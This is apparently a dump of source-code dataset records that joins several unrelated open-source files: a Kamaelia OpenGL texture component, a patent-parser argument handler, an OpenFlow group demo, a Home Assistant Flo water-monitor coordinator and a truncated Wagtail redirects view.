set(CMAKE_MODULE_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_MODULE_PATH})
# Make find_package() to work
set(CMAKE_PREFIX_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_PREFIX_PATH})
endmacro()""", macro)
| mit | -7,118,005,159,781,577,000 | 40.545455 | 85 | 0.675419 | false |
bbc/kamaelia | Sketches/THF/Packages/Kamaelia/Community/THF/Kamaelia/UI/OpenGL/TexPlane.py | 12 | 5411 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
"""\
=====================
Textured Plane
=====================
A plane showing a texture loaded from an image file.
This component is a subclass of OpenGLComponent and therefore uses the
OpenGL display service.
Example Usage
-------------
A plane showing an image loaded from the file "nemo.jpeg"::
PLANE = TexPlane(position=(0, 0,-6), texture="nemo.jpeg").activate()
Axon.Scheduler.scheduler.run.runThreads()
How does it work?
-----------------
This component is a subclass of OpenGLComponent (for OpenGLComponent
functionality see its documentation). It overrides
__init__(), setup(), draw().
In setup() the method loadTexture() gets called, which loads the texture
from the specified image file. If the image in the file has dimensions
which are not powers of two, the texture dimensions get enlarged
(this is needed because of OpenGL texturing limitations).
In draw() a simple plane is drawn with the loaded texture on it.
"""
import Axon
import pygame
from pygame.locals import *
from OpenGL.GL import *
from OpenGL.GLU import *
from Vector import Vector
from OpenGLComponent import *
from math import *
class TexPlane(OpenGLComponent):
"""\
TexPlane(...) -> A new TexPlane component.
A plane showing a texture loaded from an image file.
Keyword arguments:
    - texture -- image file name
- pixelscaling -- factor for translation from pixels to units in 3D space (default=100.0)
"""
def __init__(self, **argd):
"""x.__init__(...) initializes x; see x.__class__.__doc__ for signature"""
super(TexPlane, self).__init__(**argd)
self.tex = argd.get("texture")
self.texID = 0
self.pixelscaling = argd.get("pixelscaling", 100.0)
def draw(self):
""" Draws textured plane. """
# set texure
glEnable(GL_TEXTURE_2D)
glBindTexture(GL_TEXTURE_2D, self.texID)
# draw faces
glTexEnvf(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_REPLACE)
glBegin(GL_QUADS)
w = self.size.x/2.0
h = self.size.y/2.0
glTexCoord2f(0.0, 1.0-self.tex_h); glVertex3f(-w, -h, 0.0)
glTexCoord2f(self.tex_w, 1.0-self.tex_h); glVertex3f( w, -h, 0.0)
glTexCoord2f(self.tex_w, 1.0); glVertex3f( w, h, 0.0)
glTexCoord2f(0.0, 1.0); glVertex3f(-w, h, 0.0)
glEnd()
glDisable(GL_TEXTURE_2D)
def loadTexture(self):
""" Loads texture from specified image file. """
if self.tex is not None:
# load image
image = pygame.image.load(self.tex)
# create power of 2 dimensioned surface
pow2size = (int(2**(ceil(log(image.get_width(), 2)))), int(2**(ceil(log(image.get_height(), 2)))))
if pow2size != image.get_size():
textureSurface = pygame.Surface(pow2size, pygame.SRCALPHA, 32)
# determine texture coordinates
self.tex_w = float(image.get_width())/pow2size[0]
self.tex_h = float(image.get_height())/pow2size[1]
# copy image data to pow2surface
textureSurface.blit(image, (0,0))
else:
textureSurface = image
self.tex_w = 1.0
self.tex_h = 1.0
# set plane size
self.size = Vector(float(image.get_width())/float(self.pixelscaling), float(image.get_height())/float(self.pixelscaling), 0)
# read pixel data
textureData = pygame.image.tostring(textureSurface, "RGBX", 1)
# gen tex name
self.texID = glGenTextures(1)
# create texture
glEnable(GL_TEXTURE_2D)
glBindTexture(GL_TEXTURE_2D, self.texID)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexImage2D( GL_TEXTURE_2D, 0, GL_RGBA, textureSurface.get_width(), textureSurface.get_height(), 0,
GL_RGBA, GL_UNSIGNED_BYTE, textureData );
glDisable(GL_TEXTURE_2D)
def setup(self):
""" Load texture. """
self.loadTexture()
__kamaelia_components__ = (TexPlane,)
if __name__=='__main__':
PLANE = TexPlane(position=(0, 0,-6), texture="nemo.jpeg").activate()
Axon.Scheduler.scheduler.run.runThreads()
# Licensed to the BBC under a Contributor Agreement: THF
| apache-2.0 | -6,426,957,485,463,028,000 | 34.136364 | 136 | 0.608945 | false |
yngcan/patentprocessor | lib/argconfig_parse.py | 6 | 4419 | #!/usr/bin/env python
"""
Copyright (c) 2013 The Regents of the University of California, AMERICAN INSTITUTES FOR RESEARCH
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
"""
@author Gabe Fierro [email protected] github.com/gtfierro
"""
"""
Handles argument parsing for parse.py
"""
import sys
import os
import argparse
import logging
class ArgHandler(object):
def __init__(self, arglist):
self.arglist = arglist
# setup argparse
self.parser = argparse.ArgumentParser(description=\
'Specify source directory/directories for xml files to be parsed')
self.parser.add_argument('--patentroot','-p', type=str, nargs='?',
default=os.environ['PATENTROOT'] \
if os.environ.has_key('PATENTROOT') else '.',
help='root directory of all patent files')
self.parser.add_argument('--xmlregex','-x', type=str,
nargs='?',
help='regex used to match xml files in the PATENTROOT directory.\
Defaults to ipg\d{6}.xml')
self.parser.add_argument('--verbosity', '-v', type = int,
nargs='?', default=0,
help='Set the level of verbosity for the computation. The higher the \
verbosity level, the less restrictive the print policy. 0 (default) \
= error, 1 = warning, 2 = info, 3 = debug')
self.parser.add_argument('--output-directory', '-o', type=str, nargs='?',
default=os.environ['PATENTOUTPUTDIR'] \
if os.environ.has_key('PATENTOUTPUTDIR') else '.',
help='Set the output directory for the resulting sqlite3 files. Defaults\
to the current directory "."')
self.parser.add_argument('--document-type', '-d', type=str, nargs='?',
default='grant',
help='Set the type of patent document to be parsed: grant (default) \
or application')
# parse arguments and assign values
args = self.parser.parse_args(self.arglist)
self.xmlregex = args.xmlregex
self.patentroot = args.patentroot
self.output_directory = args.output_directory
self.document_type = args.document_type
if self.xmlregex == None: # set defaults for xmlregex here depending on doctype
if self.document_type == 'grant':
self.xmlregex = r"ipg\d{6}.xml"
else:
self.xmlregex = r"i?pa\d{6}.xml"
# adjust verbosity levels based on specified input
logging_levels = {0: logging.ERROR,
1: logging.WARNING,
2: logging.INFO,
3: logging.DEBUG}
self.verbosity = logging_levels[args.verbosity]
def get_xmlregex(self):
return self.xmlregex
def get_patentroot(self):
return self.patentroot
def get_verbosity(self):
return self.verbosity
def get_output_directory(self):
return self.output_directory
def get_document_type(self):
return self.document_type
def get_help(self):
self.parser.print_help()
sys.exit(1)
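# Hedged usage sketch (editor's addition): ArgHandler is meant to be driven by
# a caller such as parse.py (per the module docstring), roughly like:
#   args = ArgHandler(sys.argv[1:])
#   logging.basicConfig(level=args.get_verbosity())
#   xmlregex = args.get_xmlregex()
#   patentroot = args.get_patentroot()
#   output_dir = args.get_output_directory()
# The exact caller is not shown here, so treat the above as an assumption.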
| bsd-2-clause | -1,561,995,159,197,825,000 | 40.688679 | 96 | 0.651957 | false |
tnadeau/pybvc | samples/sampleopenflow/demos/demo35.py | 4 | 13745 | #!/usr/bin/python
# Copyright (c) 2015, BROCADE COMMUNICATIONS SYSTEMS, INC
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
"""
@authors: Sergei Garbuzov
@status: Development
@version: 1.1.0
"""
import json
import time
from pybvc.controller.controller import Controller
from pybvc.openflowdev.ofswitch import (OFSwitch,
FlowEntry,
Match,
Instruction,
PopVlanHeaderAction,
GroupAction,
GroupEntry,
GroupBucket,
OutputAction)
from pybvc.common.utils import load_dict_from_file
from pybvc.common.status import STATUS
from pybvc.common.constants import (OFPGT_INDIRECT, ETH_TYPE_IPv4)
def delete_flows(ofswitch, table_id, flow_ids):
for flow_id in flow_ids:
result = ofswitch.delete_flow(table_id, flow_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow with id of '%s' successfully removed "
"from the Controller" % flow_id)
else:
print ("!!!Flow '%s' removal error, reason: %s" %
(flow_id, status.brief()))
def delete_groups(ofswitch, group_ids):
for group_id in group_ids:
result = ofswitch.delete_group(group_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Group '%s' successfully removed from the Controller" %
group_id)
else:
print ("!!!Group '%s' removal error, reason: %s" %
(group_id, status.brief()))
def print_groups(lcfg, loper):
q = 10 # number of list items to be in a single chunk (output string)
print "\n".strip()
s = 'Configured Groups IDs'
if lcfg:
chunks = [lcfg[x:x + q] for x in xrange(0, len(lcfg), q)]
print " %s :" % s,
for i in range(0, len(chunks)):
n = 0 if i == 0 else len(s) + 18
print "%s%s" % (" " * n, ", ".join(map(str, chunks[i])))
else:
print " %s : %s" % (s, "none")
s = 'Operational Groups IDs'
if loper:
chunks = [loper[x:x + q] for x in xrange(0, len(loper), q)]
print " %s :" % s,
for i in range(0, len(chunks)):
n = 0 if i == 0 else len(s) + 18
print "%s%s" % (" " * n, ", ".join(map(str, chunks[i])))
else:
print " %s : %s" % (s, "none")
def of_demo_35():
f = "cfg.yml"
d = {}
if(load_dict_from_file(f, d) is False):
print("Config file '%s' read error: " % f)
exit()
try:
ctrlIpAddr = d['ctrlIpAddr']
ctrlPortNum = d['ctrlPortNum']
ctrlUname = d['ctrlUname']
ctrlPswd = d['ctrlPswd']
nodeName = d['nodeName']
rundelay = d['rundelay']
except:
print ("Failed to get Controller device attributes")
exit(0)
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print ("<<< Demo 35 Start")
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
ctrl = Controller(ctrlIpAddr, ctrlPortNum, ctrlUname, ctrlPswd)
ofswitch = OFSwitch(ctrl, nodeName)
print "\n".strip()
print ("<<< 'Controller': %s, 'OpenFlow' switch: '%s'" %
(ctrlIpAddr, nodeName))
grp_ids_cfg = []
grp_ids_oper = []
print "\n".strip()
print ("<<< Get OpenFlow Groups Information")
time.sleep(rundelay)
result = ofswitch.get_configured_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_cfg = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_cfg = []
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
result = ofswitch.get_operational_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_oper = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_oper = []
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
# Show current state of the Group Table in the Controller's
# configuration and operational data stores
print_groups(grp_ids_cfg, grp_ids_oper)
# Create new group
group_id = 14
group_type = OFPGT_INDIRECT
group_name = "Example of 'set of common actions' group "
out_port = 110
print "\n".strip()
print ("<<< Create Group")
print "\n".strip()
print (" Group Type : %s\n"
" Group ID : %s\n"
" Group Name : \"%s\"" %
(group_type.strip('group-').upper(),
group_id, group_name))
print (" Buckets :")
print (" [0] actions : Pop VLAN")
print (" Output (%s)" %
(out_port))
time.sleep(rundelay)
# Allocate a placeholder for the group entry
group_entry = GroupEntry(group_id, group_type)
group_entry.set_group_name(group_name)
# Fill actions bucket with the set of actions
bucket_id = 0
bucket = GroupBucket(bucket_id)
action_order = 0
action1 = PopVlanHeaderAction(action_order)
bucket.add_action(action1)
action_order += 1
action2 = OutputAction(action_order)
action2.set_outport(out_port)
bucket.add_action(action2)
# Add actions bucket to the group entry
group_entry.add_bucket(bucket)
# Request Controller to create the group
print "\n".strip()
print ("<<< Group to create:")
print group_entry.get_payload()
time.sleep(rundelay)
result = ofswitch.add_modify_group(group_entry)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Group successfully added")
grp_ids_oper = result.get_data()
else:
print ("\n").strip()
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
print ("\n").strip()
print ("<<< Get group '%s' configuration status") % group_id
time.sleep(rundelay)
result = ofswitch.get_configured_group(group_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("Group configuration info:")
group = result.get_data()
print json.dumps(group, indent=4)
else:
print ("\n").strip()
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
print ("\n").strip()
print ("<<< Get group '%s' operational status") % group_id
time.sleep(rundelay)
result = ofswitch.get_group_description(group_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("Group operational info:")
group = result.get_data()
print json.dumps(group, indent=4)
else:
print ("\n").strip()
print ("!!!Error, reason: %s" % status.detailed())
print ("\n").strip()
print ("<<< Get group '%s' statistics information") % group_id
time.sleep(rundelay)
result = ofswitch.get_group_statistics(group_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("Group statistics info:")
group = result.get_data()
print json.dumps(group, indent=4)
else:
print ("\n").strip()
print ("!!!Error, reason: %s" % status.detailed())
print ("\n").strip()
print ("<<< Get OpenFlow Groups Information")
time.sleep(rundelay)
result = ofswitch.get_configured_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_cfg = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_cfg = []
else:
print ("\n").strip()
print ("!!!Error, reason: %s" % status.detailed())
result = ofswitch.get_operational_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_oper = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_oper = []
else:
print ("\n").strip()
print ("!!!Error, reason: %s" % status.detailed())
# Show current state of the Group Table in the Controller's
# configuration and operational data stores
print_groups(grp_ids_cfg, grp_ids_oper)
first_flow_id = 110
# ---------------------------------------------------
# First flow entry
# ---------------------------------------------------
table_id = 0
flow_id = first_flow_id
flow_name = "Group action example"
priority = 1000
cookie = 1400
match_in_port = 109
match_eth_type = ETH_TYPE_IPv4
print "\n".strip()
print ("<<< Set OpenFlow flow on the Controller")
print (" Match: Input Port (%s)\n"
" Ethernet Type (%s)" %
(match_in_port, hex(match_eth_type)))
print (" Actions: Apply Group (%s)\n" % group_id)
time.sleep(rundelay)
# Allocate a placeholder for the Flow Entry
flow_entry1 = FlowEntry()
# Generic attributes of the Flow Entry
flow_entry1.set_flow_table_id(table_id)
flow_entry1.set_flow_name(flow_name)
flow_entry1.set_flow_id(flow_id)
flow_entry1.set_flow_cookie(cookie)
flow_entry1.set_flow_priority(priority)
flow_entry1.set_flow_hard_timeout(0)
flow_entry1.set_flow_idle_timeout(0)
# Instructions/Actions for the Flow Entry
instruction = Instruction(instruction_order=0)
action_order = 0
action = GroupAction(action_order)
action.set_group_id(group_id)
instruction.add_apply_action(action)
flow_entry1.add_instruction(instruction)
# Match Fields for the Flow Entry
match = Match()
match.set_in_port(match_in_port)
match.set_eth_type(match_eth_type)
flow_entry1.add_match(match)
print ("<<< Flow to send:")
print flow_entry1.get_payload()
time.sleep(rundelay)
result = ofswitch.add_modify_flow(flow_entry1)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow successfully added to the Controller")
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
delete_groups(ofswitch, grp_ids_cfg)
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
exit(0)
print "\n".strip()
print ("<<< Remove all flows from the Controller")
time.sleep(rundelay)
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
print "\n".strip()
print ("<<< Remove all groups from the Controller")
for group_id in grp_ids_cfg:
result = ofswitch.delete_group(group_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Group '%s' successfully removed from the Controller" %
group_id)
else:
print ("\n").strip()
print ("!!!Error, failed to remove group '%s', reason: %s" %
(group_id, status.detailed()))
print ("\n").strip()
print ("<<< Get OpenFlow Groups Information")
time.sleep(rundelay)
result = ofswitch.get_configured_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_cfg = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_cfg = []
else:
print ("\n").strip()
print ("!!!Error, reason: %s" % status.detailed())
result = ofswitch.get_operational_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_oper = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_oper = []
else:
print ("\n")
print ("!!!Error, reason: %s" % status.detailed())
# Show current state of the Group Table in the Controller's
# configuration and operational data stores
print_groups(grp_ids_cfg, grp_ids_oper)
print ("\n").strip()
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print (">>> Demo End")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
if __name__ == "__main__":
of_demo_35()
| bsd-3-clause | 4,864,706,703,511,868,000 | 32.442822 | 78 | 0.575773 | false |
balloob/home-assistant | homeassistant/components/flo/device.py | 6 | 7349 | """Flo device object."""
import asyncio
from datetime import datetime, timedelta
import logging
from typing import Any, Dict, Optional
from aioflo.api import API
from aioflo.errors import RequestError
from async_timeout import timeout
from homeassistant.helpers.typing import HomeAssistantType
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
import homeassistant.util.dt as dt_util
from .const import DOMAIN as FLO_DOMAIN
_LOGGER = logging.getLogger(__name__)
class FloDeviceDataUpdateCoordinator(DataUpdateCoordinator):
"""Flo device object."""
def __init__(
self, hass: HomeAssistantType, api_client: API, location_id: str, device_id: str
):
"""Initialize the device."""
self.hass: HomeAssistantType = hass
self.api_client: API = api_client
self._flo_location_id: str = location_id
self._flo_device_id: str = device_id
self._manufacturer: str = "Flo by Moen"
self._device_information: Optional[Dict[str, Any]] = None
self._water_usage: Optional[Dict[str, Any]] = None
super().__init__(
hass,
_LOGGER,
name=f"{FLO_DOMAIN}-{device_id}",
update_interval=timedelta(seconds=60),
)
async def _async_update_data(self):
"""Update data via library."""
try:
async with timeout(10):
await asyncio.gather(
*[self._update_device(), self._update_consumption_data()]
)
        except RequestError as error:
raise UpdateFailed(error) from error
@property
def location_id(self) -> str:
"""Return Flo location id."""
return self._flo_location_id
@property
def id(self) -> str:
"""Return Flo device id."""
return self._flo_device_id
@property
def device_name(self) -> str:
"""Return device name."""
return f"{self.manufacturer} {self.model}"
@property
def manufacturer(self) -> str:
"""Return manufacturer for device."""
return self._manufacturer
@property
def mac_address(self) -> str:
"""Return ieee address for device."""
return self._device_information["macAddress"]
@property
def model(self) -> str:
"""Return model for device."""
return self._device_information["deviceModel"]
@property
def rssi(self) -> float:
"""Return rssi for device."""
return self._device_information["connectivity"]["rssi"]
@property
def last_heard_from_time(self) -> str:
"""Return lastHeardFromTime for device."""
return self._device_information["lastHeardFromTime"]
@property
def device_type(self) -> str:
"""Return the device type for the device."""
return self._device_information["deviceType"]
@property
def available(self) -> bool:
"""Return True if device is available."""
return self.last_update_success and self._device_information["isConnected"]
@property
def current_system_mode(self) -> str:
"""Return the current system mode."""
return self._device_information["systemMode"]["lastKnown"]
@property
def target_system_mode(self) -> str:
"""Return the target system mode."""
return self._device_information["systemMode"]["target"]
@property
def current_flow_rate(self) -> float:
"""Return current flow rate in gpm."""
return self._device_information["telemetry"]["current"]["gpm"]
@property
def current_psi(self) -> float:
"""Return the current pressure in psi."""
return self._device_information["telemetry"]["current"]["psi"]
@property
def temperature(self) -> float:
"""Return the current temperature in degrees F."""
return self._device_information["telemetry"]["current"]["tempF"]
@property
def consumption_today(self) -> float:
"""Return the current consumption for today in gallons."""
return self._water_usage["aggregations"]["sumTotalGallonsConsumed"]
@property
def firmware_version(self) -> str:
"""Return the firmware version for the device."""
return self._device_information["fwVersion"]
@property
def serial_number(self) -> str:
"""Return the serial number for the device."""
return self._device_information["serialNumber"]
@property
def pending_info_alerts_count(self) -> int:
"""Return the number of pending info alerts for the device."""
return self._device_information["notifications"]["pending"]["infoCount"]
@property
def pending_warning_alerts_count(self) -> int:
"""Return the number of pending warning alerts for the device."""
return self._device_information["notifications"]["pending"]["warningCount"]
@property
def pending_critical_alerts_count(self) -> int:
"""Return the number of pending critical alerts for the device."""
return self._device_information["notifications"]["pending"]["criticalCount"]
@property
def has_alerts(self) -> bool:
"""Return True if any alert counts are greater than zero."""
return bool(
self.pending_info_alerts_count
or self.pending_warning_alerts_count
            or self.pending_critical_alerts_count
)
@property
def last_known_valve_state(self) -> str:
"""Return the last known valve state for the device."""
return self._device_information["valve"]["lastKnown"]
@property
def target_valve_state(self) -> str:
"""Return the target valve state for the device."""
return self._device_information["valve"]["target"]
async def async_set_mode_home(self):
"""Set the Flo location to home mode."""
await self.api_client.location.set_mode_home(self._flo_location_id)
async def async_set_mode_away(self):
"""Set the Flo location to away mode."""
await self.api_client.location.set_mode_away(self._flo_location_id)
async def async_set_mode_sleep(self, sleep_minutes, revert_to_mode):
"""Set the Flo location to sleep mode."""
await self.api_client.location.set_mode_sleep(
self._flo_location_id, sleep_minutes, revert_to_mode
)
async def async_run_health_test(self):
"""Run a Flo device health test."""
await self.api_client.device.run_health_test(self._flo_device_id)
async def _update_device(self, *_) -> None:
"""Update the device information from the API."""
self._device_information = await self.api_client.device.get_info(
self._flo_device_id
)
_LOGGER.debug("Flo device data: %s", self._device_information)
async def _update_consumption_data(self, *_) -> None:
"""Update water consumption data from the API."""
today = dt_util.now().date()
start_date = datetime(today.year, today.month, today.day, 0, 0)
end_date = datetime(today.year, today.month, today.day, 23, 59, 59, 999000)
self._water_usage = await self.api_client.water.get_consumption_info(
self._flo_location_id, start_date, end_date
)
_LOGGER.debug("Updated Flo consumption data: %s", self._water_usage)
| apache-2.0 | -6,069,660,303,512,820,000 | 34.331731 | 88 | 0.629609 | false |
frankyrumple/smc | static/scheduler/start_misc_scheduler.py | 1 | 1998 | #!/usr/bin/python
import sys, os
import subprocess
# Get the current folder
folder = os.path.abspath(__file__)
folder = os.path.dirname(folder)
# Change to static folder
folder = os.path.dirname(folder)
# Change to app folder
folder = os.path.dirname(folder)
# Get app name
app_name = folder.split(os.sep)[-1]
# Change to applications folder
folder = os.path.dirname(folder)
# Change to w2py root folder
folder = os.path.dirname(folder)
# Set the system to that folder
os.chdir(folder)
# Change to the web2py folder
print "App: " + app_name
print "W2PyFolder: " + os.getcwd()
group_name = "misc"
print "Scheduler Group: " + group_name
pid = "0"
try:
f = open(app_name + ".scheduler." + group_name + ".pid", 'r+')
pid = f.read()
f.close()
except IOError:
pid = "0"
pid = pid.strip()
if (pid == ""):
pid = "0"
print "Last PID: " + str(pid)
# See if web2py scheduler is running
cmd1 = ["/bin/ps ax | grep 'web2py' | awk '{print $1;}'"]
p1 = subprocess.Popen(cmd1, stdout=subprocess.PIPE, shell=True)
out = p1.communicate()[0]
running = False
for line in out.split(os.linesep):
if (pid == line.strip()):
running = True
print "PS List: " + out
s = open(app_name + '.scheduler.' + group_name + '.log', 'a')
if (running == True):
# Process is running?
print "PS IS RUNNING"
s.write("PS IS RUNNING\n")
else:
print "PS NOT RUNNING"
s.write("PS NOT RUNNING\n")
# Start the scheduler app
#cmd = ["/usr/bin/nohup /usr/bin/python web2py.py -K " + app_name + " > /dev/null 2>&1 &"]
cmd = ["/usr/bin/nohup", "/usr/bin/python", "web2py.py", "-K", app_name + ":" + group_name] #, "&"] # "> /dev/null 2>&1 &"]
print "RUN APP: " + str(cmd)
#p = subprocess.Popen(cmd, shell=True, close_fds=True) #, creationflags=0x00000008)
p = subprocess.Popen(cmd, close_fds=True) #, creationflags=0x00000008)
f = open(app_name + '.scheduler.' + group_name + '.pid', 'w')
f.write(str(p.pid))
f.close()
# Should run and block until done
#print p.communicate()[0]
#p.wait()
s.close()
sys.exit(0)
| mit | 8,902,003,102,001,837,000 | 25.64 | 124 | 0.648148 | false |
WQuanfeng/wagtail | wagtail/wagtailredirects/views.py | 10 | 4821 | from django.shortcuts import render, redirect, get_object_or_404
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.utils.translation import ugettext as _
from django.views.decorators.vary import vary_on_headers
from django.core.urlresolvers import reverse
from wagtail.wagtailadmin.edit_handlers import ObjectList
from wagtail.wagtailadmin.forms import SearchForm
from wagtail.wagtailadmin.utils import permission_required, any_permission_required
from wagtail.wagtailadmin import messages
from wagtail.wagtailredirects import models
REDIRECT_EDIT_HANDLER = ObjectList(models.Redirect.content_panels).bind_to_model(models.Redirect)
@any_permission_required('wagtailredirects.add_redirect', 'wagtailredirects.change_redirect', 'wagtailredirects.delete_redirect')
@vary_on_headers('X-Requested-With')
def index(request):
page = request.GET.get('p', 1)
query_string = request.GET.get('q', "")
ordering = request.GET.get('ordering', 'old_path')
redirects = models.Redirect.get_for_site(site=request.site).prefetch_related('redirect_page')
# Search
if query_string:
redirects = redirects.filter(old_path__icontains=query_string)
# Ordering (A bit useless at the moment as only 'old_path' is allowed)
if ordering not in ['old_path']:
ordering = 'old_path'
if ordering != 'old_path':
redirects = redirects.order_by(ordering)
# Pagination
paginator = Paginator(redirects, 20)
try:
redirects = paginator.page(page)
except PageNotAnInteger:
redirects = paginator.page(1)
except EmptyPage:
redirects = paginator.page(paginator.num_pages)
# Render template
if request.is_ajax():
return render(request, "wagtailredirects/results.html", {
'ordering': ordering,
'redirects': redirects,
'query_string': query_string,
})
else:
return render(request, "wagtailredirects/index.html", {
'ordering': ordering,
'redirects': redirects,
'query_string': query_string,
'search_form': SearchForm(data=dict(q=query_string) if query_string else None, placeholder=_("Search redirects")),
})
@permission_required('wagtailredirects.change_redirect')
def edit(request, redirect_id):
theredirect = get_object_or_404(models.Redirect, id=redirect_id)
form_class = REDIRECT_EDIT_HANDLER.get_form_class(models.Redirect)
if request.POST:
form = form_class(request.POST, request.FILES, instance=theredirect)
if form.is_valid():
form.save()
messages.success(request, _("Redirect '{0}' updated.").format(theredirect.title), buttons=[
messages.button(reverse('wagtailredirects:edit', args=(theredirect.id,)), _('Edit'))
])
return redirect('wagtailredirects:index')
else:
messages.error(request, _("The redirect could not be saved due to errors."))
edit_handler = REDIRECT_EDIT_HANDLER(instance=theredirect, form=form)
else:
form = form_class(instance=theredirect)
edit_handler = REDIRECT_EDIT_HANDLER(instance=theredirect, form=form)
return render(request, "wagtailredirects/edit.html", {
'redirect': theredirect,
'edit_handler': edit_handler,
})
@permission_required('wagtailredirects.delete_redirect')
def delete(request, redirect_id):
theredirect = get_object_or_404(models.Redirect, id=redirect_id)
if request.POST:
theredirect.delete()
messages.success(request, _("Redirect '{0}' deleted.").format(theredirect.title))
return redirect('wagtailredirects:index')
